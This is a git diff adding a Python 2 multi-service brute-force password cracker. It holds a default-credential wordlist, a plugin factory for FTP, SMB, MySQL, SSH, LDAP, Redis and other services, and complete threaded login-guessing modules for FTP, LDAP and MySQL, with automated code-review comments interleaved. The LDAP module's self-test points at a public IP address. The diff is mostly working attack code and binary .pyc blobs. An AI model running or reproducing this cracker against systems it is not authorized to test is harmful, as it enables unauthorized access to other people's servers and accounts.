@@ -0,0 +1,69 @@ +cisco:1 +cisco:12 +cisco:cisco +cisco:123 +cisco:1234 +cisco:12345 +cisco:123456 +cisco:1234567 +cisco:12345678 +cisco:123456789 +cisco:1234567890 +cisco:654321 +cisco:54321 +cisco:00000000 +cisco:88888888 +cisco:pass +cisco:password +cisco:passwd +cisco:!@#$%^ +cisco:1q2w3e +cisco:qawsed +cisco:pwd +cisco:1qaz2ws3e4 +cisco:qazwsxedc +cisco:!@#$%^&* +cisco:rootpass +cisco:rootpassword +cisco:rootpasswd +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:123123 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 \ No newline at end of file diff --git a/Bruteforce/factorys/__init__.py b/Bruteforce/factorys/__init__.py new file mode 100644 index 0000000..013e4b7 --- /dev/null +++ b/Bruteforce/factorys/__init__.py @@ -0,0 +1 @@ +#!/usr/bin/python diff --git a/Bruteforce/factorys/__init__.pyc b/Bruteforce/factorys/__init__.pyc new file mode 100644 index 0000000000000000000000000000000000000000..497125a80f9ccf56330d92310bb5b7297e0d08b5 GIT binary patch literal 150 zcmZSn%*(awLr_>U0~9afB*mh literal 0 HcmV?d00001 diff --git a/Bruteforce/factorys/pluginFactory.py b/Bruteforce/factorys/pluginFactory.py new file mode 100644 index 0000000..b64b07c --- /dev/null +++ b/Bruteforce/factorys/pluginFactory.py 
@@ -0,0 +1,101 @@
+# coding: utf-8
+__author__="wilson"
+import os
+import sys
+
+sys.path.append("../")
+
+from plugins.ftp import *
+from plugins.smb import *
+from plugins.mysql import *
+from plugins.mssql import *
+from plugins.ldapd import *
+from plugins.mongodb import *
+from plugins.redisexp import *
+from plugins.rsync import *
+from plugins.snmp import *
+from plugins.ssh import *
+from plugins.ssltest import *
+from plugins.vnc import *
+from plugins.web import *
+
+def ftpburp(c):
+ t = ftp_burp(c)
+ return t
+
+def smbburp(c):
+ t = smb_burp(c)
+ return t
+
+def mysqlburp(c):
+ t = mysql_burp(c)
+ return t
+
+def mssqlburp(c):
+ t = mssql_burp(c)
+ return t
+
+def ldapburp(c):
+ t = ldap_burp(c)
+ return t
+
+def mongodbburp(c):
+ t = mongodb_burp(c)
+ return t
+
+def redisburp(c):
+ t = redis_burp(c)
+ return t
+
+def rsyncburp(c):
+ t = rsync_burp(c)
+ return t
+
+def snmpburp(c):
+ t = snmp_burp(c)
+ return t
+
+def sshburp(c):
+ t = ssh_burp(c)
+ return t
+
+def sslburp(c):
+ t = ssl_burp(c)
+ return t
+
+def vncburp(c):
+ t = vnc_burp(c)
+ return t
+
+def webburp(c):
+ t = web_burp(c)
+ return t
+#类
+class pluginFactory():
+ def __init__(self,c):
+ self.pluginList=[]
+ self.config=c
+ self.pluginCategory= {
+ "ftp":ftpburp,
+ "smb":smbburp,
+ "mysql":mysqlburp,
+ "mssql":mssqlburp,
+ "ldap":ldapburp,
+ "mongodb":mongodbburp,
+ "redis":redisburp,
+ "rsync":rsyncburp,
+ "snmp":snmpburp,
+ "ssh":sshburp,
+ "ssl":sslburp,
+ "vnc":vncburp,
+ "web":webburp,
+ }
+ self.get_pluginList()
+
+
+ def get_pluginList(self):
+ for name in self.pluginCategory:
+ #实例化每个类
+ result_t=self.pluginCategory.get(name)(self.config)
+ self.pluginList.append(result_t)
+
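Review bot: The thirteen `from plugins.<name> import *` lines at the top of pluginFactory.py import every public name of every plugin, so a name defined by two plugins is resolved silently by import order and a reader cannot tell where `ftp_burp` or `ssl_burp` is defined. Import each class explicitly (`from plugins.ftp import ftp_burp`) and store the classes themselves in `pluginCategory` (`"ftp": ftp_burp,`); the thirteen wrapper functions that only call a constructor and return the result then become unnecessary. `sys.path.append("../")` is resolved against the current working directory, not this file's location, so the imports depend on where the program is started from. The comments `#类` and `#实例化每个类` could be replaced by an English class docstring saying that the constructor instantiates every registered plugin with the shared config object.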
diff --git a/Bruteforce/factorys/pluginFactory.pyc b/Bruteforce/factorys/pluginFactory.pyc new file mode 100644 index 0000000000000000000000000000000000000000..f94693233120e61100cac54c9c1dd3525525311b GIT binary patch literal 4320 zcmcgvU2hvj6urAnoY=7whme*ww4gpzR#j{Y(mtT5AcFb;C=VMbA`)6$&-x=;uU*fW z)>3#Xe}+H9pMiHc=dQhR9`b@6dp&p0jCbcA-?=k$rto*Q{MVoVyll(tQ^5Tz6npH6 z7?E>WPmC{#C+7ee_T}7{*q4ifTx^Ib$U9Fw{ru;BN#T;$rXgf!x9F=pllcP$G zsyW)t(O!;fIob!>ls`cEJuyWE2V%Aqyf0>3!J(Lvf;(c$3hs*8QSgD7ih_G$stWFl z*;Q~PW>3L~VrmK=h}l>0Pz>Cm{{vRviTr&25yN#>KSUH=5#~)lvBR|gFFvQ1@ohAk zbwpPj&675*KPxA=+Zv1$xkP`S{O-x6hwk{)Y4+MSV8@N3SCjFm&NsEAwpv$5UDVhw zfto+scx;;)ho&126Wi>>X}33NrCr-@rD;5lnw?hL4aZa493_)(KYfu^8>6Y)LLcx& zS9bvI28?(W@Bgv3gI8CqL&hRxhqu5Pp2+z=dS8Nb8Ltnf_I0ub)}^^G@_x7i-gb?= z>5IG{EytTNNK9)XwQns+IEm&Wh%D{tifWI684@NsPVc1;U2g|YMWU;olhFEjIfhThQVila%v2tge zb^Uw3Jm=rmlGEf2PmJ@|%X5AcuVdvSXLus#7mJ)-6}4;1rHuytP&MiQqY#Lp4WUs* zg_}<;3(0m~knl`ZRGU(Yg}OwA7=D(n3b632ht2stt#m$s0*Q^@fM_h|TXctArr9Nwk5M{`8;00w`1-t|e# z#a+lyZR*A@%Epu)GnvajXXB)!qF}|MkxN_@_0ztKqVMSE5sY{xTm^6IhO6qU4(7nH zoS;~mx5qkyBH#S-Ocgwa6JM3`(DWQ#U&XzzSWi)x+Ty(~%TGGync&y(aGU6ogH5{VR$k1MzD9kyoc*^%+HU zA4QroQ8XBuNrGzl3=im=R|BVL6~~m2dih%v)%r!RbeK8$7)>)Ct%>Um$DqX-KD1f7 zPp!sl)N;M>b3V)T&9crmaO}BO=ajozX>3Ce2G?733NAiFg=rk8!o1h{oa7;I-llUi zemlC>*;uD3wdMRVovw=vu~A;@+uFp%n4XKza4Ij>F{PKDvl{MO7)H&X<1AyIbDZok UOcBS;ieK}~-VK*u+PLZZ58fD=^#A|> literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/.DS_Store b/Bruteforce/plugins/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..bac480a0c80a770d90e685e36bb2673fba863d1a GIT binary patch literal 6148 zcmeHKJ5Iw;5Zr|nk!Vsbwx{rVMMQVUb}On>SVBD27(#xwn zPWd1A<6PI*b$fhkM7~b9pMKz(*Y)jU?(jT%CcRmH5@x6X6`%rCfC~H%1<naC zsQ?wA0%ry6`%vJ9RpJonpAIZO0s!qd-VN72O8|=nfK}oUhzLxB3Jj{|h@nA8ykuRK zI0Ob=G=~q(J8MoT>UYQa#mhyjK(17P3QQHajP1ty{~df`{-2V#qXJamPbr|QdSCDG zO4(ayFK4~Bz#rg0hFUMj;;k6ytr#0?#n+>{V%Nx5i9?{%5qCO}KLVx;jSBpR0^iII BCSw2q literal 0 HcmV?d00001 
diff --git a/Bruteforce/plugins/__init__.py b/Bruteforce/plugins/__init__.py new file mode 100644 index 0000000..7c9c8f4 --- /dev/null +++ b/Bruteforce/plugins/__init__.py @@ -0,0 +1 @@ +__author__ = 'wilson' diff --git a/Bruteforce/plugins/__init__.pyc b/Bruteforce/plugins/__init__.pyc new file mode 100644 index 0000000000000000000000000000000000000000..5cb4cabc7a0877bf8772eca24f945b01b31bf064 GIT binary patch literal 171 zcmZSn%*$od8XTI;00oRd+5w1*xqw6p149&$WMl}|U;=VW*nmWNW=?T_o}UItVF^f4 ze0*YQNk)EAe7pvb$ABP;O@Lhe(BjmhVtt4%{gV9roMQd7)V%bJ(!{*<;^f4CUpP+ literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/ftp.py b/Bruteforce/plugins/ftp.py new file mode 100644 index 0000000..fff0050 --- /dev/null +++ b/Bruteforce/plugins/ftp.py 
@@ -0,0 +1,76 @@
+#coding=utf-8
+import time
+import threading
+from multiprocessing.dummy import Pool
+from printers import printPink,printGreen
+from ftplib import FTP
+
+
+class ftp_burp(object):
+
+ def __init__(self,c):
+ self.config=c
+ self.lock=threading.Lock()
+ self.result=[]
+ self.lines=self.config.file2list("conf/ftp.conf")
+
+
+ def ftp_connect(self,ip,username,password,port):
+ crack=0
+ try:
+ ftp=FTP()
+ ftp.connect(ip,str(port))
+ ftp.login(user=username,passwd=password)
+ crack=1
+ ftp.close()
+ except Exception,e:
+ self.lock.acquire()
+ print "%s ftp service 's %s:%s login fail " %(ip,username,password)
+ self.lock.release()
+ return crack
+
+
+ def ftp_l(self,ip,port):
+ try:
+ for data in self.lines:
+ username=data.split(':')[0]
+ password=data.split(':')[1]
+ if self.ftp_connect(ip,username,password,port)==1:
+ self.lock.acquire()
+ printGreen("%s ftp at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ self.result.append("%s ftp at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ self.lock.release()
+ break
+ except Exception,e:
+ pass
+
+ def run(self,ipdict,pinglist,threads,file):
+ if len(ipdict['ftp']):
+ printPink("crack ftp now...")
+ print "[*] start crack ftp %s" % time.ctime()
+ starttime=time.time()
+
+ pool=Pool(threads)
+
+ for ip in ipdict['ftp']:
+ pool.apply_async(func=self.ftp_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
+ pool.close()
+ pool.join()
+
+ print "[*] stop ftp serice %s" % time.ctime()
+ print "[*] crack ftp done,it has Elapsed time:%s " % (time.time()-starttime)
+
+ for i in xrange(len(self.result)):
+ self.config.write_file(contents=self.result[i],file=file)
+
+
+if __name__ == '__main__':
+ import sys
+ sys.path.append("../")
+ from comm.config import *
+ c=config()
+ ipdict={'ftp': ['192.168.1.1:21']}
+ pinglist=['192.168.1.1']
+ test=ftp_burp(c)
+ test.run(ipdict,pinglist,50,file="../result/test")
+
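Review bot: In `ftp_connect`, `ftp.close()` sits inside the `try` after `login`, so it is skipped whenever `connect` or `login` raises and the socket is left open until garbage collection; close the connection in a `finally:` block instead. The `self.lock.acquire()` … `self.lock.release()` pairs around the print calls would leave the lock held if the print raised, and `with self.lock:` is the safer form. `ftp_l` wraps its whole loop in `except Exception,e: pass`, so any error, including the `IndexError` from `data.split(':')[1]` on a malformed line of the list file, ends the run for that host without a message; the exception should at least be logged. The same lock pattern and the same silent `except` appear in `ldap_creak` in ldapd.py and `mysq1` in mysql.py.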
diff --git a/Bruteforce/plugins/ftp.pyc b/Bruteforce/plugins/ftp.pyc new file mode 100644 index 0000000000000000000000000000000000000000..cc1ec695216ef5db10042636b89d718338176220 GIT binary patch literal 3147 zcmb_eO>-N^5$(l-APE8d5M^3YWErxp1f@~{Q&A}r%ay1sIdZC0w7il-2PxLp3Oj%n zT;MVA=jMjyYpTzDCv;OArXKb^nCU7biaPR{`c*s z{qBd~4Q2jm;Qu}z`%g46ex9TvgIBUA15d|mlGbGE%fJ_p>wHP;GF_0tf=nASXjG$h zNf%|hB!eaN7sM>f2-_R-Cy`T;-w&E%&Plu|`!y;5aduuy1}!lynY3lHBJq-(dX=_i zNmu2WS>xWpx+GB5lrh?Ka%XT};ubrD4KYx=&Rv5GVlK$!9Wm#{Y)IUe7z$VA)c3qh zFZZ;&hKnXY;Ge_!zjy48TN~GHcm3kz}DhOy&Q%~mbfrH2PKwn7jM~H z#WUpb9N@qD>(3D2g_8w2`mHzx-AO}^8!~}kJaIKSuG2@SHSsvA!8k^2d^z^v+L{;F zxtnuXh?91+UrQbL+;2+xjd&-E*a&B1eo^Ovas~*BeHr<(`RMccG+>PFnI~T#FCY|j z;ZB04Lfj0#P`4J5wFfbvjk|q_=DO|R>K#n~F&Uc9&ur(q-Ns;=!!4arl%$<5K^pi} z#Xus4nHf6A0qe>tCS0x3FwL#esC{-gG=)p@ETGGDYcza0OG=}1X;Kqe)8%B);tC=$ zDKrE$H;bl5J8E)X#)^+3FDn=f%LquJ5wKqYV7lo1zW`v+p)j1^@;tisBK3L=&j$uJ z@oji3z(d8kVrmpG9U6W zgxDh1h%F+FX>^f)nztmdw$5Ttg%r3O;F*I#SC8tlNiKT@nEx^lH5Fo>yle}8ySv#2 zfVZr``x}4a)3?eMPxe%CfYYy=PYK|uKm3FD5~1c zE-5aclNBwtND~*l&oRZpCMDt^Am$XXQBjyI4&LS9J7|SXyruh+8- z{2y-Yb*zg@*Lh?9y4A3cX4z1Ms2tm%gVk?9^!4VvP_5t<(j3rgZ_E|HRvG7+xtTb{ z@n>mNSQB?#GBxBwWg?J*GntzojH;y7T}dc4SwK=%Q@E*OLrMXL#S!zsa(Wa-_9z<$ zAE6(RUIGG3b$~*H3+xcilN?>L_+g29Wi%lIf>GZR4$8!tkcF{gXC+XsPKr1IIWwCI z6j!a9T7I?M+JGsc^sN3=LwQ<(@~HWwS)RO!=3v#gIl%ZwBxO%rL-s<5`Msu!8LsO{m*`iSBC?Rr;Sxe!%N9W3|*bYRiku ztII2MYo<|>g`wqDdcA)2LdGcHu&Zddw(j<}?%nSF;#O~K`_@*4V#ayv9!Bn9vbUAo zLSMaZc?oE#UTpf#Sl3m)BM<||&XM1yc^Kny$C+wD2*NF)2Y6uC1b@`z?2NO*wFS0 o&@eW5n_gG{ep1EvS0sFU1x*V)x`qO~=5KCSauX$Y4NuGaH}1r2L;wH) literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/ldapd.py b/Bruteforce/plugins/ldapd.py new file mode 100644 index 0000000..45f2a69 --- /dev/null +++ b/Bruteforce/plugins/ldapd.py 
@@ -0,0 +1,86 @@
+#coding=utf-8
+import time
+import threading
+from printers import printPink,printGreen
+from multiprocessing.dummy import Pool
+import ldap
+
+class ldap_burp(object):
+
+ def __init__(self,c):
+ self.config=c
+ self.lock=threading.Lock()
+ self.result=[]
+ self.lines=self.config.file2list("conf/ldapd.conf")
+
+
+ def ldap_connect(self,ip,username,password,port):
+ creak=0
+ try:
+ ldappath='ldap://'+ip+':'+port+'/'
+ l = ldap.initialize(ldappath)
+ re=l.simple_bind(username,password)
+ if re==1:
+ creak=1
+ except Exception,e:
+ if e[0]['desc']=="Can't contact LDAP server":
+ creak=2
+ pass
+ return creak
+
+ def ldap_creak(self,ip,port):
+ try:
+ for data in self.lines:
+ username=data.split(':')[0]
+ password=data.split(':')[1]
+ flag=self.ldap_connect(ip,username,password,port)
+ if flag==2:
+ self.lock.acquire()
+ printGreen("%s ldap at %s can't connect\r\n" %(ip,port))
+ self.lock.release()
+ break
+
+ if flag==1:
+ self.lock.acquire()
+ printGreen("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ self.result.append("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ self.lock.release()
+ break
+ else:
+ self.lock.acquire()
+ print "%s ldap service 's %s:%s login fail " %(ip,username,password)
+ self.lock.release()
+ except Exception,e:
+ pass
+
+
+ def run(self,ipdict,pinglist,threads,file):
+ if len(ipdict['ldap']):
+ printPink("crack ldap now...")
+ print "[*] start ldap %s" % time.ctime()
+ starttime=time.time()
+
+ pool=Pool(threads)
+
+ for ip in ipdict['ldap']:
+ pool.apply_async(func=self.ldap_creak,args=(str(ip).split(':')[0],str(ip).split(':')[1]))
+ pool.close()
+ pool.join()
+
+ print "[*] stop ldap serice %s" % time.ctime()
+ print "[*] crack ldap done,it has Elapsed time:%s " % (time.time()-starttime)
+
+ for i in xrange(len(self.result)):
+ self.config.write_file(contents=self.result[i],file=file)
+
+if __name__ == '__main__':
+ import sys
+ sys.path.append("../")
+ from comm.config import *
+ c=config()
+ ipdict={'ldap': ['124.172.223.236:389']}
+ pinglist=['192.168.1.1']
+ test=ldap_burp(c)
+ test.run(ipdict,pinglist,50,file="../result/test")
+
+
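Review bot: The `ipdict` line in the `__main__` block names a publicly routable address, so running this module directly sends bind attempts to a host that the person running the self-test most likely does not operate. The equivalent blocks in ftp.py and mysql.py use a private and a loopback address. Replace it with a loopback address, `ipdict={'ldap': ['127.0.0.1:389']}`, and leave real targets to the caller that builds `ipdict`. `pinglist` in the same block still refers to `192.168.1.1`, which does not match the `ipdict` entry; `run` accepts the argument but never reads it in this hunk.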
diff --git a/Bruteforce/plugins/ldapd.pyc b/Bruteforce/plugins/ldapd.pyc new file mode 100644 index 0000000000000000000000000000000000000000..7a0ebdf3b3616e71dbd3cb83883065cb9f847774 GIT binary patch literal 3353 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 A^#A|> literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/mysql.py b/Bruteforce/plugins/mysql.py new file mode 100644 index 0000000..4388efa --- /dev/null +++ b/Bruteforce/plugins/mysql.py 
@@ -0,0 +1,80 @@ +#coding=utf-8 +import time +import threading +from printers import printPink,printGreen +from multiprocessing.dummy import Pool +import MySQLdb + + +class mysql_burp(object): + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/mysql.conf") + + def mysql_connect(self,ip,username,password,port): + crack =0 + try: + db=MySQLdb.connect(ip,username,password,port=port) + if db: + crack=1 + db.close() + except Exception, e: + if e[0]==1045: + self.lock.acquire() + print "%s mysql's %s:%s login fail" %(ip,username,password) + self.lock.release() + else: + self.lock.acquire() + print "connect %s mysql service at %s login fail " %(ip,port) + self.lock.release() + crack=2 + return crack + + def mysq1(self,ip,port): + try: + for data in self.lines: + username=data.split(':')[0] + password=data.split(':')[1] + flag=self.mysql_connect(ip,username,password,port) + if flag==2: + break + + if flag==1: + self.lock.acquire() + printGreen("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.result.append("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.release() + break + except Exception,e: + pass + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['mysql']): + printPink("crack mysql now...") + print "[*] start crack mysql %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + for ip in ipdict['mysql']: + pool.apply_async(func=self.mysq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + pool.close() + pool.join() + + print "[*] stop crack mysql %s" % time.ctime() + print "[*] crack mysql done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'mysql': 
['127.0.0.1:3306']} + pinglist=['127.0.0.1'] + test=mysql_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") \ No newline at end of file diff --git a/Bruteforce/plugins/mysql.pyc b/Bruteforce/plugins/mysql.pyc new file mode 100644 index 0000000000000000000000000000000000000000..d557ab399f49838fdab1e8d07409158676165509 GIT binary patch literal 3269 zcmb`J&u<&Y702I@6eUumBuj~EJ83{Sa7q}dcStX_ z++FPqD-ndoaxU_lK}&2~;-(zdr2PBETB|Zx6}u{vj!e1|FUz^9W?GSS zO+K;f96Q*M1XHzSjIu2c2iGKCWo57_7SnEU)L={OmP}p~drj=7#2tw-;hLP+jmdOl z&-&}wWb!|J_WCu5zJ;PFlgvL&vP0j#sC`sgoAnJf8YrITd8(b$xjRaS&u3+E=|3uc zfS-F8g@vi=Eo^yEqc17cC9bK^pugC%B*C*jXO3va#qSrK<`IfhBc~!mtZrmdqXSs2 z%eWF6tWNM<;tJR~dz*CVGu_pm<2Iu_8||vWI~4oNX!DFVYspx*?q8HPjFW7v+kBEo zhbp8Ls9IV#OTDU&lGNT$6X*RBI?^Pwu5ux_;cPmBt(d!yLbPxXA?<$ZZ0UB7lhoze zu7@Ap?#O227qc)MyC}>uTMl=NbT&>hx3IRD`xOiw4wEeL!y$v>*dV55*71vI02^qb z`s}X|;EA&(ng2vQ90Ql&Ta#0D{b_>?oHgaNDdhvk0Gc2I)ylhOKl{Bjd|eLPQhp)k zY+1}H7&dYvZYZvQRF^mCazw)b>dOU2b=m&tmy8Iyo7#Q!<=51)H0)`}sP+wA5Kn82 ze15uw_;Fu*35trmA}>A22ehxl&+ZLKw_Q)8`a{>d?H-|)=5Stb6vD@M(2wwDHuC7K z^m>TE?~=&<$U!?j;1T;(~DeYX0owC-HMnc`=E`I!beAm4OdWB3t+*&jN*sMHn5; zlG5s+(xx_aR`(FBqSJGMq|k8AU`7^BtyYTAx#PTygEeX~o>3WsIqJg#ZrJuwe0P$% zn4~(ji!E)S!SzsxX_~ru17*vs0jv$vHJfIm)`i?PZ4=d@!*Fn$irK#)%>O1QUoFnx z{?b{68w>385wt9;`i$ z!XrhoB9Osx_fcGuRT1?fbiHF69@?yT5!YL{epG#w&~CfWLmaTsV7nqsd_b5Lq+p8@ zgC5Y|nt8&auvr|u#>Pz)S5O77vrWNa>WM=i2HR}<9turgqcj``H&J^v2oX;rbnk5l z?kyAoa5l^q{;r#jY1BFZ=BDYP>;N9kPrO+8Q*hqG-jJ3Me5MqHth{O9UckceA>06e zQfGLONhoX12Q=6YP=XRbIXSqP;PJu7f)vH{1ty@P@kj7+3X!&;j#%TKg@EjG13~_l zjukZo3F%yF=IDv+bGo)7LTObc+_*2BhO76|I`DTL)}FjCzN4Fi5nV2c@8g4a@roSJ>7K%&r`0j$niCdDEX$8~c6Qu#H2?O_LC^WH z^u3oAZo4Y>vn)~}EXOW*6Y5t4I}%cj&Wo=N*6W*nFV7k0nSD3$Jre$58WzsRJ)cZ1 zv##bb
